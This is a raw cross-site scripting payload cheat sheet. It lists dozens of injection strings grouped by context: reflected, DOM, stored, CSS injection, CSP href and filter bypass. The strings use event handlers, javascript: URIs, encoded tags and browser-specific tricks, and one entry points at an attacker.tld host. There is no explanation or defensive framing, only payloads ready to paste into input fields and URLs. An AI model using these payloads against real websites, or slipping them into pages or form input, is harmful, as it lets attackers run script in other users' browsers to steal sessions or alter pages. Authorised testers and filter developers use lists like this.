&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;

<img/src='x'onerror=alert`1`>.
( URL ) :- 

javascript:prompt(1)                                  

brute<body/onpageshow=(prompt)(/XSSPOSED/)>logic  

'-confirm(1)-'

"+confirm(1)+"#/
 
<script>$='XSSPOSED',alert($)< /script>-jobs/

<script>alert(1);//
 
( URL ) # DOM :- 

onmouseover=alert('XSS') 

"onmouseover=alert(1)"   

(Stored) :- 

iframe src='javascript:prompt(document.domain);'>//   

&quot;&gt;&lt;svg/onload=alert(1)&gt;  #Encode HTML  

quot;&gt;&lt;svg/onload=window.onerror=alert;throw/XSS/;// #window.onerror

[Click here](javascript:alert(1))      #Fliter Tag  Href

<a>'/ <a> onmouseover="confirm(1)">XXS link </a> #Fliter Tag a  

"><b onmouseover=alert('wufff!')>  XSS  ! </b> #Tag b

<a onmouseover=alert(1)>click 

<i onmouseover=alert(1)> <i></i> 

"><svg/onload=prompt(2)>"<input onfocus="alert(1337)"autofocus> # Bypass Subdomains Google

name'"><img src=x onmouseover=alert(1);>.jpg #Upload Photo Submit 

<svg/onload=javascript:void(0)?void(0):void(0)?:void(0)?void(0):void(0)?void(0):confirm #Function void

<iframe src="http://google.com"></iframe> #Best Payload for Check iframe clean Payload 

'%3d'>"><iframe src="https://atmail.com" onmouseover=alert(document.domain)></iframe>/927 

<iframe src="data:$te?QWERTY%(x)[0]{t}*/h123t456m789l0,<script>alert(document.domain)</script>">

<a href="javascript:alert(document.domain)">CLICK HERE TO XSS</a>

-><a id="a"href=javascript&colon;alert&lpar;1&rpar; id="a">Click</a>

<input type=</script><svg><script>/<@/>alert(1337)</script> 

"><article xmlns="><img src=x onerror=alert(1)"></article>

</script><script>confirm(1)</script> becomes </script-disabled><script-disabled>confirm(1)</script-disabled>

</script%0A-_-><script>confirm(1)</script%0A-_->

<div</textarea><script>alert(123)</script>  Tag textarea 

<img src=a:alert(1) onerror=eval(src)>

<title><img src='</title><img src=s onerror=alert(1)>'></title>


CSS Injection :- 

<div style="background-image:url(javascript:alert('XSS'))">  #Use "> OR '"> For Intercept 

<a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px XSS'></a>

<div style="width: expression(alert(/XSS_Jams/));"></div>
 
<marquee loop=1 width=0 onfinish=alert(1)>

<a style="-webkit-user-modify: read-only;" =href"javascript:alert(1)">CLICK

<javas style=font-size:500px onmouseover=location=tagName%2binnerHTML%2bURL>cript:</javas>#%0Aalert(1)



CSP href :- 
 
<a onmouseover="alert(1)" href="http://dhiqaroffice.com/test-pentest/testhtmlxss.html">read this!</a> 

<a href="data:\@['{§(`__`)$}']@\, % 3 c script % 3 e alert(1) % 3 c/script %3 e">XSS</a> #FireFox

<style onload='execScript(/**/"\x61lert&#40 1&#41","j\x61vascript");'>  (IE)

<p style='\00\xss:\0a\0b\0c\09\65xpre\73sio\6e/**/(\61lert(1))'>XSS</p> (IE)

<details ontoggle=confirm(1)> Chrome




(Fliters XSSPOSED )

brute<body/onpageshow=(prompt)(/XSSPOSED/)>logic 

<svg><x><script>alert&#40;7&#41</x> 

<svg/brute><x><script/logic>al&#101rt&#40;7&#41</x>

<script> alert("XSSPOSED")<\script>>\

--><svg/onload=alert(/XSSPOSED/)//                    
                    
<\i\m\g \s\r\c=x \o\n\e\r\r\o\r=\a\l\e\r\t(\'X\S\S\')\>'

"><img src=”data:;base64,YWxlcnQoOSk” onerror=prompt(1);>

<script/xx>/**/alert(/XSSPOSED/)//


URL Webhook :- 

http://example.com%20onmouseover=alert(1)%20style=font-size:100pt%20 

Bypassing in Firefox:-

“<link rel=’subresource’ href=’http://attacker.tld’>” we use “<a href=’http://attacker.tld’>”